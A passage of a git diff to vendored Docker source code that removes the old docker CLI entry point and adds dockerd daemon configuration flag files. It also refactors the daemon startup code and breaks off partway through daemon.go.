"github.com/spf13/cobra" -) - -const daemonBinary = "dockerd" - -func newDaemonCommand() *cobra.Command { - cmd := &cobra.Command{ - Use: "daemon", - Hidden: true, - Args: cobra.ArbitraryArgs, - DisableFlagParsing: true, - RunE: func(cmd *cobra.Command, args []string) error { - return runDaemon() - }, - Deprecated: "and will be removed in Docker 1.16. Please run `dockerd` directly.", - } - cmd.SetHelpFunc(helpFunc) - return cmd -} - -// CmdDaemon execs dockerd with the same flags -func runDaemon() error { - // Use os.Args[1:] so that "global" args are passed to dockerd - return execDaemon(stripDaemonArg(os.Args[1:])) -} - -func execDaemon(args []string) error { - binaryPath, err := findDaemonBinary() - if err != nil { - return err - } - - return syscall.Exec( - binaryPath, - append([]string{daemonBinary}, args...), - os.Environ()) -} - -func helpFunc(cmd *cobra.Command, args []string) { - if err := execDaemon([]string{"--help"}); err != nil { - fmt.Fprintf(os.Stderr, "%s\n", err.Error()) - } -} - -// findDaemonBinary looks for the path to the dockerd binary starting with -// the directory of the current executable (if one exists) and followed by $PATH -func findDaemonBinary() (string, error) { - execDirname := filepath.Dir(os.Args[0]) - if execDirname != "" { - binaryPath := filepath.Join(execDirname, daemonBinary) - if _, err := os.Stat(binaryPath); err == nil { - return binaryPath, nil - } - } - - return exec.LookPath(daemonBinary) -} - -// stripDaemonArg removes the `daemon` argument from the list -func stripDaemonArg(args []string) []string { - for i, arg := range args { - if arg == "daemon" { - return append(args[:i], args[i+1:]...) - } - } - return args -} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker.go b/vendor/github.com/docker/docker/cmd/docker/docker.go deleted file mode 100644 index d4847a90ee..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/docker.go +++ /dev/null @@ -1,180 +0,0 @@ -package main - -import ( - "errors" - "fmt" - "os" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types/versions" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/commands" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/pkg/term" - "github.com/docker/docker/utils" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -func newDockerCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := cliflags.NewClientOptions() - var flags *pflag.FlagSet - - cmd := &cobra.Command{ - Use: "docker [OPTIONS] COMMAND [ARG...]", - Short: "A self-sufficient runtime for containers", - SilenceUsage: true, - SilenceErrors: true, - TraverseChildren: true, - Args: noArgs, - RunE: func(cmd *cobra.Command, args []string) error { - if opts.Version { - showVersion() - return nil - } - return dockerCli.ShowHelp(cmd, args) - }, - PersistentPreRunE: func(cmd *cobra.Command, args []string) error { - // daemon command is special, we redirect directly to another binary - if cmd.Name() == "daemon" { - return nil - } - // flags must be the top-level command flags, not cmd.Flags() - opts.Common.SetDefaultOptions(flags) - dockerPreRun(opts) - if err := dockerCli.Initialize(opts); err != nil { - return err - } - return isSupported(cmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) - }, - } - cli.SetupRootCommand(cmd) - - cmd.SetHelpFunc(func(ccmd *cobra.Command, args []string) { - if dockerCli.Client() == nil { // when using --help, PersistenPreRun is not called, so initialization is needed. - // flags must be the top-level command flags, not cmd.Flags() - opts.Common.SetDefaultOptions(flags) - dockerPreRun(opts) - dockerCli.Initialize(opts) - } - - if err := isSupported(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()); err != nil { - ccmd.Println(err) - return - } - - hideUnsupportedFeatures(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()) - - if err := ccmd.Help(); err != nil { - ccmd.Println(err) - } - }) - - flags = cmd.Flags() - flags.BoolVarP(&opts.Version, "version", "v", false, "Print version information and quit") - flags.StringVar(&opts.ConfigDir, "config", cliconfig.ConfigDir(), "Location of client config files") - opts.Common.InstallFlags(flags) - - cmd.SetOutput(dockerCli.Out()) - cmd.AddCommand(newDaemonCommand()) - commands.AddCommands(cmd, dockerCli) - - return cmd -} - -func noArgs(cmd *cobra.Command, args []string) error { - if len(args) == 0 { - return nil - } - return fmt.Errorf( - "docker: '%s' is not a docker command.\nSee 'docker --help'", args[0]) -} - -func main() { - // Set terminal emulation based on platform as required. - stdin, stdout, stderr := term.StdStreams() - logrus.SetOutput(stderr) - - dockerCli := command.NewDockerCli(stdin, stdout, stderr) - cmd := newDockerCommand(dockerCli) - - if err := cmd.Execute(); err != nil { - if sterr, ok := err.(cli.StatusError); ok { - if sterr.Status != "" { - fmt.Fprintln(stderr, sterr.Status) - } - // StatusError should only be used for errors, and all errors should - // have a non-zero exit status, so never exit with 0 - if sterr.StatusCode == 0 { - os.Exit(1) - } - os.Exit(sterr.StatusCode) - } - fmt.Fprintln(stderr, err) - os.Exit(1) - } -} - -func showVersion() { - fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) -} - -func dockerPreRun(opts *cliflags.ClientOptions) { - cliflags.SetLogLevel(opts.Common.LogLevel) - - if opts.ConfigDir != "" { - cliconfig.SetConfigDir(opts.ConfigDir) - } - - if opts.Common.Debug { - utils.EnableDebug() - } -} - -func hideUnsupportedFeatures(cmd *cobra.Command, clientVersion string, hasExperimental bool) { - cmd.Flags().VisitAll(func(f *pflag.Flag) { - // hide experimental flags - if !hasExperimental { - if _, ok := f.Annotations["experimental"]; ok { - f.Hidden = true - } - } - - // hide flags not supported by the server - if flagVersion, ok := f.Annotations["version"]; ok && len(flagVersion) == 1 && versions.LessThan(clientVersion, flagVersion[0]) { - f.Hidden = true - } - - }) - - for _, subcmd := range cmd.Commands() { - // hide experimental subcommands - if !hasExperimental { - if _, ok := subcmd.Tags["experimental"]; ok { - subcmd.Hidden = true - } - } - - // hide subcommands not supported by the server - if subcmdVersion, ok := subcmd.Tags["version"]; ok && versions.LessThan(clientVersion, subcmdVersion) { - subcmd.Hidden = true - } - } -} - -func isSupported(cmd *cobra.Command, clientVersion string, hasExperimental bool) error { - if !hasExperimental { - if _, ok := cmd.Tags["experimental"]; ok { - return errors.New("only supported with experimental daemon") - } - } - - if cmdVersion, ok := cmd.Tags["version"]; ok && versions.LessThan(clientVersion, cmdVersion) { - return fmt.Errorf("only supported with daemon version >= %s", cmdVersion) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_test.go b/vendor/github.com/docker/docker/cmd/docker/docker_test.go deleted file mode 100644 index 8738f6005d..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/docker_test.go +++ /dev/null @@ -1,32 +0,0 @@ -package main - -import ( - "io/ioutil" - "os" - "testing" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/utils" -) - -func TestClientDebugEnabled(t *testing.T) { - defer utils.DisableDebug() - - cmd := newDockerCommand(&command.DockerCli{}) - cmd.Flags().Set("debug", "true") - - err := cmd.PersistentPreRunE(cmd, []string{}) - assert.NilError(t, err) - assert.Equal(t, os.Getenv("DEBUG"), "1") - assert.Equal(t, logrus.GetLevel(), logrus.DebugLevel) -} - -func TestExitStatusForInvalidSubcommandWithHelpFlag(t *testing.T) { - discard := ioutil.Discard - cmd := newDockerCommand(command.NewDockerCli(os.Stdin, discard, discard)) - cmd.SetArgs([]string{"help", "invalid"}) - err := cmd.Execute() - assert.Error(t, err, "unknown help topic: invalid") -} diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go deleted file mode 100644 index 9bc507e20c..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go +++ /dev/null @@ -1,18 +0,0 @@ -package main - -import ( - "sync/atomic" - - _ "github.com/docker/docker/autogen/winresources/docker" -) - -//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" - -var dummy uintptr - -func init() { - // Ensure that this import is not removed by the linker. This is used to - // ensure that shell32.dll is loaded by the system loader, preventing - // go#15286 from triggering on Nano Server TP5. - atomic.LoadUintptr(&dummy) -} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config.go b/vendor/github.com/docker/docker/cmd/dockerd/config.go new file mode 100644 index 0000000000..abdac9a7fb --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config.go @@ -0,0 +1,99 @@ +package main + +import ( + "runtime" + + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/opts" + "github.com/docker/docker/registry" + "github.com/spf13/pflag" +) + +const ( + // defaultShutdownTimeout is the default shutdown timeout for the daemon + defaultShutdownTimeout = 15 + // defaultTrustKeyFile is the default filename for the trust key + defaultTrustKeyFile = "key.json" +) + +// installCommonConfigFlags adds flags to the pflag.FlagSet to configure the daemon +func installCommonConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + var maxConcurrentDownloads, maxConcurrentUploads int + + installRegistryServiceFlags(&conf.ServiceOptions, flags) + + flags.Var(opts.NewNamedListOptsRef("storage-opts", &conf.GraphOptions, nil), "storage-opt", "Storage driver options") + flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &conf.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load") + flags.Var(opts.NewNamedListOptsRef("exec-opts", &conf.ExecOptions, nil), "exec-opt", "Runtime execution options") + flags.StringVarP(&conf.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file") + flags.StringVarP(&conf.Root, "graph", "g", defaultDataRoot, "Root of the Docker runtime") + flags.StringVar(&conf.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files") + flags.StringVar(&conf.ContainerdAddr, "containerd", "", "containerd grpc address") + + // "--graph" is "soft-deprecated" in favor of "data-root". This flag was added + // before Docker 1.0, so won't be removed, only hidden, to discourage its usage. + flags.MarkHidden("graph") + + flags.StringVar(&conf.Root, "data-root", defaultDataRoot, "Root directory of persistent Docker state") + + flags.BoolVarP(&conf.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run") + flags.MarkDeprecated("restart", "Please use a restart policy on docker run") + + // Windows doesn't support setting the storage driver - there is no choice as to which ones to use. + if runtime.GOOS != "windows" { + flags.StringVarP(&conf.GraphDriver, "storage-driver", "s", "", "Storage driver to use") + } + + flags.IntVar(&conf.Mtu, "mtu", 0, "Set the containers network MTU") + flags.BoolVar(&conf.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring") + flags.Var(opts.NewListOptsRef(&conf.DNS, opts.ValidateIPAddress), "dns", "DNS server to use") + flags.Var(opts.NewNamedListOptsRef("dns-opts", &conf.DNSOptions, nil), "dns-opt", "DNS options to use") + flags.Var(opts.NewListOptsRef(&conf.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use") + flags.Var(opts.NewNamedListOptsRef("labels", &conf.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon") + flags.StringVar(&conf.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs") + flags.Var(opts.NewNamedMapOpts("log-opts", conf.LogConfig.Config, nil), "log-opt", "Default log driver options for containers") + flags.StringVar(&conf.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise") + flags.StringVar(&conf.ClusterStore, "cluster-store", "", "URL of the distributed storage backend") + flags.Var(opts.NewNamedMapOpts("cluster-store-opts", conf.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options") + flags.StringVar(&conf.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API") + flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", config.DefaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull") + flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", config.DefaultMaxConcurrentUploads, "Set the max concurrent uploads for each push") + flags.IntVar(&conf.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout") + flags.IntVar(&conf.NetworkDiagnosticPort, "network-diagnostic-port", 0, "TCP port number of the network diagnostic server") + flags.MarkHidden("network-diagnostic-port") + + flags.StringVar(&conf.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address") + flags.BoolVar(&conf.Experimental, "experimental", false, "Enable experimental features") + + flags.StringVar(&conf.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on") + + flags.Var(opts.NewNamedListOptsRef("node-generic-resources", &conf.NodeGenericResources, opts.ValidateSingleGenericResource), "node-generic-resource", "Advertise user-defined resource") + + flags.IntVar(&conf.NetworkControlPlaneMTU, "network-control-plane-mtu", config.DefaultNetworkMtu, "Network Control plane MTU") + + // "--deprecated-key-path" is to allow configuration of the key used + // for the daemon ID and the deprecated image signing. It was never + // exposed as a command line option but is added here to allow + // overriding the default path in configuration. + flags.Var(opts.NewQuotedString(&conf.TrustKeyPath), "deprecated-key-path", "Path to key file for ID and image signing") + flags.MarkHidden("deprecated-key-path") + + conf.MaxConcurrentDownloads = &maxConcurrentDownloads + conf.MaxConcurrentUploads = &maxConcurrentUploads +} + +func installRegistryServiceFlags(options *registry.ServiceOptions, flags *pflag.FlagSet) { + ana := opts.NewNamedListOptsRef("allow-nondistributable-artifacts", &options.AllowNondistributableArtifacts, registry.ValidateIndexName) + mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, registry.ValidateMirror) + insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, registry.ValidateIndexName) + + flags.Var(ana, "allow-nondistributable-artifacts", "Allow push of nondistributable artifacts to registry") + flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror") + flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication") + + if runtime.GOOS != "windows" { + // TODO: Remove this flag after 3 release cycles (18.03) + flags.BoolVar(&options.V2Only, "disable-legacy-registry", true, "Disable contacting legacy registries") + flags.MarkHidden("disable-legacy-registry") + } +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go new file mode 100644 index 0000000000..febf30ae9f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go @@ -0,0 +1,34 @@ +// +build linux freebsd + +package main + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/opts" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile = "/var/run/docker.pid" + defaultDataRoot = "/var/lib/docker" + defaultExecRoot = "/var/run/docker" +) + +// installUnixConfigFlags adds command-line options to the top-level flag parser for +// the current process that are common across Unix platforms. +func installUnixConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + conf.Runtimes = make(map[string]types.Runtime) + + flags.StringVarP(&conf.SocketGroup, "group", "G", "docker", "Group for the unix socket") + flags.StringVar(&conf.BridgeConfig.IP, "bip", "", "Specify network bridge IP") + flags.StringVarP(&conf.BridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge") + flags.StringVar(&conf.BridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address") + flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address") + flags.BoolVar(&conf.BridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication") + flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports") + flags.Var(opts.NewNamedRuntimeOpt("runtimes", &conf.Runtimes, config.StockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime") + flags.StringVar(&conf.DefaultRuntime, "default-runtime", config.StockRuntimeName, "Default OCI runtime for containers") + +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go new file mode 100644 index 0000000000..2dbd84b1db --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go @@ -0,0 +1,50 @@ +// +build linux freebsd + +package main + +import ( + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/opts" + "github.com/docker/go-units" + "github.com/spf13/pflag" +) + +// installConfigFlags adds flags to the pflag.FlagSet to configure the daemon +func installConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + installCommonConfigFlags(conf, flags) + + // Then install flags common to unix platforms + installUnixConfigFlags(conf, flags) + + conf.Ulimits = make(map[string]*units.Ulimit) + conf.NetworkConfig.DefaultAddressPools = opts.PoolsOpt{} + + // Set default value for `--default-shm-size` + conf.ShmSize = opts.MemBytes(config.DefaultShmSize) + + // Then platform-specific install flags + flags.BoolVar(&conf.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support") + flags.Var(opts.NewNamedUlimitOpt("default-ulimits", &conf.Ulimits), "default-ulimit", "Default ulimits for containers") + flags.BoolVar(&conf.BridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules") + flags.BoolVar(&conf.BridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward") + flags.BoolVar(&conf.BridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading") + flags.BoolVar(&conf.BridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking") + flags.StringVar(&conf.BridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs") + flags.BoolVar(&conf.BridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic") + flags.StringVar(&conf.BridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary") + flags.StringVar(&conf.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers") + flags.StringVar(&conf.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces") + flags.BoolVar(&conf.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running") + flags.IntVar(&conf.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon") + flags.BoolVar(&conf.Init, "init", false, "Run an init in the container to forward signals and reap processes") + flags.StringVar(&conf.InitPath, "init-path", "", "Path to the docker-init binary") + flags.Int64Var(&conf.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") + flags.Int64Var(&conf.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") + flags.StringVar(&conf.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile") + flags.Var(&conf.ShmSize, "default-shm-size", "Default shm size for containers") + flags.BoolVar(&conf.NoNewPrivileges, "no-new-privileges", false, "Set no-new-privileges by default for new containers") + flags.StringVar(&conf.IpcMode, "default-ipc-mode", config.DefaultIpcMode, `Default mode for containers ipc ("shareable" | "private")`) + flags.Var(&conf.NetworkConfig.DefaultAddressPools, "default-address-pool", "Default address pools for node specific local networks") + +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go new file mode 100644 index 0000000000..d7dbf4b4cc --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go @@ -0,0 +1,23 @@ +// +build linux freebsd + +package main + +import ( + "testing" + + "github.com/docker/docker/daemon/config" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDaemonParseShmSize(t *testing.T) { + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + conf := &config.Config{} + installConfigFlags(conf, flags) + // By default `--default-shm-size=64M` + assert.Check(t, is.Equal(int64(64*1024*1024), conf.ShmSize.Value())) + assert.Check(t, flags.Set("default-shm-size", "128M")) + assert.Check(t, is.Equal(int64(128*1024*1024), conf.ShmSize.Value())) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go new file mode 100644 index 0000000000..36af76645f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go @@ -0,0 +1,26 @@ +package main + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/daemon/config" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile string + defaultDataRoot = filepath.Join(os.Getenv("programdata"), "docker") + defaultExecRoot = filepath.Join(os.Getenv("programdata"), "docker", "exec-root") +) + +// installConfigFlags adds flags to the pflag.FlagSet to configure the daemon +func installConfigFlags(conf *config.Config, flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + installCommonConfigFlags(conf, flags) + + // Then platform-specific install flags. + flags.StringVar(&conf.BridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.StringVarP(&conf.BridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch") + flags.StringVarP(&conf.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe") +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go index 2f099e0199..efefaa1ac3 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go @@ -1,60 +1,63 @@ package main import ( + "context" "crypto/tls" "fmt" - "io" "os" "path/filepath" "runtime" "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/distribution/uuid" "github.com/docker/docker/api" apiserver "github.com/docker/docker/api/server" + buildbackend "github.com/docker/docker/api/server/backend/build" "github.com/docker/docker/api/server/middleware" "github.com/docker/docker/api/server/router" "github.com/docker/docker/api/server/router/build" checkpointrouter "github.com/docker/docker/api/server/router/checkpoint" "github.com/docker/docker/api/server/router/container" + distributionrouter "github.com/docker/docker/api/server/router/distribution" "github.com/docker/docker/api/server/router/image" "github.com/docker/docker/api/server/router/network" pluginrouter "github.com/docker/docker/api/server/router/plugin" + sessionrouter "github.com/docker/docker/api/server/router/session" swarmrouter "github.com/docker/docker/api/server/router/swarm" systemrouter "github.com/docker/docker/api/server/router/system" "github.com/docker/docker/api/server/router/volume" + buildkit "github.com/docker/docker/builder/builder-next" "github.com/docker/docker/builder/dockerfile" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/cliconfig" + "github.com/docker/docker/builder/fscache" + "github.com/docker/docker/cli/debug" "github.com/docker/docker/daemon" "github.com/docker/docker/daemon/cluster" - "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/listeners" "github.com/docker/docker/dockerversion" "github.com/docker/docker/libcontainerd" dopts "github.com/docker/docker/opts" "github.com/docker/docker/pkg/authorization" - "github.com/docker/docker/pkg/jsonlog" - "github.com/docker/docker/pkg/listeners" + "github.com/docker/docker/pkg/jsonmessage" "github.com/docker/docker/pkg/pidfile" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/system" + "github.com/docker/docker/plugin" "github.com/docker/docker/registry" "github.com/docker/docker/runconfig" - "github.com/docker/docker/utils" "github.com/docker/go-connections/tlsconfig" + swarmapi "github.com/docker/swarmkit/api" + "github.com/moby/buildkit/session" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" ) -const ( - flagDaemonConfigFile = "config-file" -) - // DaemonCli represents the daemon CLI. type DaemonCli struct { - *daemon.Config + *config.Config configFile *string flags *pflag.FlagSet @@ -68,60 +71,14 @@ func NewDaemonCli() *DaemonCli { return &DaemonCli{} } -func migrateKey(config *daemon.Config) (err error) { - // No migration necessary on Windows - if runtime.GOOS == "windows" { - return nil - } - - // Migrate trust key if exists at ~/.docker/key.json and owned by current user - oldPath := filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) - newPath := filepath.Join(getDaemonConfDir(config.Root), cliflags.DefaultTrustKeyFile) - if _, statErr := os.Stat(newPath); os.IsNotExist(statErr) && currentUserIsOwner(oldPath) { - defer func() { - // Ensure old path is removed if no error occurred - if err == nil { - err = os.Remove(oldPath) - } else { - logrus.Warnf("Key migration failed, key file not removed at %s", oldPath) - os.Remove(newPath) - } - }() - - if err := system.MkdirAll(getDaemonConfDir(config.Root), os.FileMode(0644)); err != nil { - return fmt.Errorf("Unable to create daemon configuration directory: %s", err) - } - - newFile, err := os.OpenFile(newPath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0600) - if err != nil { - return fmt.Errorf("error creating key file %q: %s", newPath, err) - } - defer newFile.Close() - - oldFile, err := os.Open(oldPath) - if err != nil { - return fmt.Errorf("error opening key file %q: %s", oldPath, err) - } - defer oldFile.Close() - - if _, err := io.Copy(newFile, oldFile); err != nil { - return fmt.Errorf("error copying key: %s", err) - } - - logrus.Infof("Migrated key from %s to %s", oldPath, newPath) - } - - return nil -} - -func (cli *DaemonCli) start(opts daemonOptions) (err error) { +func (cli *DaemonCli) start(opts *daemonOptions) (err error) { stopc := make(chan bool) defer close(stopc) // warn from uuid package when running the daemon uuid.Loggerf = logrus.Warnf - opts.common.SetDefaultOptions(opts.flags) + opts.SetDefaultOptions(opts.flags) if cli.Config, err = loadDaemonCliConfig(opts); err != nil { return err @@ -129,14 +86,8 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { cli.configFile = &opts.configFile cli.flags = opts.flags - if opts.common.TrustKey == "" { - opts.common.TrustKey = filepath.Join( - getDaemonConfDir(cli.Config.Root), - cliflags.DefaultTrustKeyFile) - } - if cli.Config.Debug { - utils.EnableDebug() + debug.Enable() } if cli.Config.Experimental { @@ -144,20 +95,17 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { } logrus.SetFormatter(&logrus.TextFormatter{ - TimestampFormat: jsonlog.RFC3339NanoFixed, + TimestampFormat: jsonmessage.RFC3339NanoFixed, DisableColors: cli.Config.RawLogs, + FullTimestamp: true, }) + system.InitLCOW(cli.Config.Experimental) + if err := setDefaultUmask(); err != nil { return fmt.Errorf("Failed to set umask: %v", err) } - if len(cli.LogConfig.Config) > 0 { - if err := logger.ValidateLogOpts(cli.LogConfig.Type, cli.LogConfig.Config); err != nil { - return fmt.Errorf("Failed to set log opts: %v", err) - } - } - // Create the daemon root before we create ANY other files (PID, or migrate keys) // to ensure the appropriate ACL is set (particularly relevant on Windows) if err := daemon.CreateDaemonRoot(cli.Config); err != nil { @@ -176,95 +124,57 @@ func (cli *DaemonCli) start(opts daemonOptions) (err error) { }() } - serverConfig := &apiserver.Config{ - Logging: true, - SocketGroup: cli.Config.SocketGroup, - Version: dockerversion.Version, - EnableCors: cli.Config.EnableCors, - CorsHeaders: cli.Config.CorsHeaders, - } - - if cli.Config.TLS { - tlsOptions := tlsconfig.Options{ - CAFile: cli.Config.CommonTLSOptions.CAFile, - CertFile: cli.Config.CommonTLSOptions.CertFile, - KeyFile: cli.Config.CommonTLSOptions.KeyFile, - } - - if cli.Config.TLSVerify { - // server requires and verifies client's certificate - tlsOptions.ClientAuth = tls.RequireAndVerifyClientCert - } - tlsConfig, err := tlsconfig.Server(tlsOptions) - if err != nil { - return err - } - serverConfig.TLSConfig = tlsConfig - } - - if len(cli.Config.Hosts) == 0 { - cli.Config.Hosts = make([]string, 1) + serverConfig, err := newAPIServerConfig(cli) + if err != nil { + return fmt.Errorf("Failed to create API server: %v", err) } + cli.api = apiserver.New(serverConfig) - api := apiserver.New(serverConfig) - cli.api = api - - for i := 0; i < len(cli.Config.Hosts); i++ { - var err error - if cli.Config.Hosts[i], err = dopts.ParseHost(cli.Config.TLS, cli.Config.Hosts[i]); err != nil { - return fmt.Errorf("error parsing -H %s : %v", cli.Config.Hosts[i], err) - } - - protoAddr := cli.Config.Hosts[i] - protoAddrParts := strings.SplitN(protoAddr, "://", 2) - if len(protoAddrParts) != 2 { - return fmt.Errorf("bad format %s, expected PROTO://ADDR", protoAddr) - } - - proto := protoAddrParts[0] - addr := protoAddrParts[1] - - // It's a bad idea to bind to TCP without tlsverify. - if proto == "tcp" && (serverConfig.TLSConfig == nil || serverConfig.TLSConfig.ClientAuth != tls.RequireAndVerifyClientCert) { - logrus.Warn("[!] DON'T BIND ON ANY IP ADDRESS WITHOUT setting -tlsverify IF YOU DON'T KNOW WHAT YOU'RE DOING [!]") - } - ls, err := listeners.Init(proto, addr, serverConfig.SocketGroup, serverConfig.TLSConfig) - if err != nil { - return err - } - ls = wrapListeners(proto, ls) - // If we're binding to a TCP port, make sure that a container doesn't try to use it. - if proto == "tcp" { - if err := allocateDaemonPort(addr); err != nil { - return err - } - } - logrus.Debugf("Listener created for HTTP on %s (%s)", proto, addr) - api.Accept(addr, ls...) + hosts, err := loadListeners(cli, serverConfig) + if err != nil { + return fmt.Errorf("Failed to load listeners: %v", err) } - if err := migrateKey(cli.Config); err != nil { + registryService, err := registry.NewService(cli.Config.ServiceOptions) + if err != nil { return err } - // FIXME: why is this down here instead of with the other TrustKey logic above? - cli.TrustKeyPath = opts.common.TrustKey - - registryService := registry.NewService(cli.Config.ServiceOptions) - containerdRemote, err := libcontainerd.New(cli.getLibcontainerdRoot(), cli.getPlatformRemoteOptions()...) + rOpts, err := cli.getRemoteOptions() + if err != nil { + return fmt.Errorf("Failed to generate containerd options: %v", err) + } + containerdRemote, err := libcontainerd.New(filepath.Join(cli.Config.Root, "containerd"), filepath.Join(cli.Config.ExecRoot, "containerd"), rOpts...) if err != nil { return err } signal.Trap(func() { cli.stop() <-stopc // wait for daemonCli.start() to return - }) + }, logrus.StandardLogger()) + + // Notify that the API is active, but before daemon is set up. + preNotifySystem() - d, err := daemon.NewDaemon(cli.Config, registryService, containerdRemote) + pluginStore := plugin.NewStore() + + if err := cli.initMiddlewares(cli.api, 